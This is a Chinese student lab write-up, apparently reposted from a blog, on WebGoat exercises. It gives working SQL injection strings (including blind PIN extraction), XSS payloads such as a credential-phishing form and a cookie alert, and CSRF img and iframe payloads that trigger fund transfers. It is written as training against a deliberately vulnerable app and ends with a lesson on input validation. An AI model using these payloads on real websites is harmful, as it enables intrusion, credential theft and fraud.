标签:com 页面 http请求 htm 没有 min 网站 标签 starting
java -jar webgoat-container-7.0.1-war-exec.jar
开启webgoat,直到出现INFO: Starting ProtocolHandler ["http-bio-8080"]
localhost:8080/WebGoat
进入webgoat。(注意"WebGoat"大小写敏感),进入webgoat(用户名和密码默认便可)station
部分,之后我们就需要用到另一个工具burp-suite
,通过将burp-suite
设置浏览器的代理服务器,作为中间服务器,这样我们就可以截获从浏览器中发送出去的所有数据包,并将其中内容修改成我们想要的样子burp-suite
在proxy
的options
选项中添加新的代理(默认为8080,不过被apache2占用了)burp-suite
中已经抓到了我们刚刚发送出去的数据包guest%0aLogin Succeeded for username:admin
最后结果显示欺骗成功‘ or 1=1;--
SELECT * FROM user_data WHERE last_name = ‘‘ or 1=1;--‘
,即查询表中所有信息ViewProfile
是无效的Login
改为ViewProfile
112 or 1=1 order by salary desc--
101
,因此我们可以构造条件1 AND 条件2
,观察最终结果是否合法来判断条件2
是否为真101 AND ((SELECT pin FROM pins WHERE cc_number=‘1111222233334444‘) > 5236 );
来验证其设定的pin值是否大于5236,按照这个原理,我们可以不断的缩小所要搜寻的pin的值,直到找到该pin值101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number=‘4321432143214321‘), x, y) = ‘h‘ );
来测试出我们需要的字符串到底是啥burp-suite
中的intruder
中的payloads
来进行爆破,一一测试所有可能性在菜单栏中依次选择Cross-site scripting
,phishing with xss
,这个攻击类似于上一个练习的一个进阶版,不仅能插入script标签还能插入其他标签构成完整的web代码(如下)
</form>
<script>
function hello(){
alert("hello,5319");
}
</script>
<form>
<br><br><h2>please input your stu_number and pwd</h2><br><br>
stu_number:
<br><input type="text" name="stunumber"><br>
password:
<br><input type="password" name="pwd"><br>
<input type="submit" name="submit" value="login" onclick="hello()">
</form>
WebGoat/capture
name="login" value="login" onclick="hack()
点击login
后,执行hack()
,获取用户名密码,并弹窗Had this been a real attack... Your credentials were just stolen.
User Name ="你的用户名 " Password = "你的密码"
<script>alert("It‘s 5236!");</script>
It‘s 5236!
<SCRIPT>alert(document.cookie);</SCRIPT>
得到cookies
http://www.targetserver.com/search.asp?input=<script>alert("hello20145236");</script>
<img src=‘attack?Screen=280&menu=900&transferFunds=100000‘ width=‘1‘ height=‘1‘>
这其中,280是我网页的scr,900是我的网页的menu,100000是转钱数额submit
,方才的代码就会被执行与上个实验类似,同样是通过邮件的方式进行恶意请求,这里添加了请求确认的要求,所以需要两个iframe模块,输入如下:
<iframe src="attack?Screen=自己的src&menu=自己的menu&transferFunds=5000"> </iframe>
<iframe src="attack?Screen=自己的src&menu=自己的menu&transferFunds=CONFIRM"> </iframe>
这一次的实验用到了webgoat,在其中做了关于SQL注入、XSS攻击和CSRF攻击,由于是全英文的网页所以对英文能力也有一定的考验==,在上一次的web基础实验中我对SQL注入、XSS攻击的理解只是表面的理解,实现的功能也很简单,这些知识点在这一次的实验中得到了很直观的学习,并且这一次的实验也警示我们,做网站编程的时候一定要对用户输入的信息做一个合法性的判断,不然会非常危险。
标签:com 页面 http请求 htm 没有 min 网站 标签 starting
原文地址:https://www.cnblogs.com/feng886779/p/9037746.html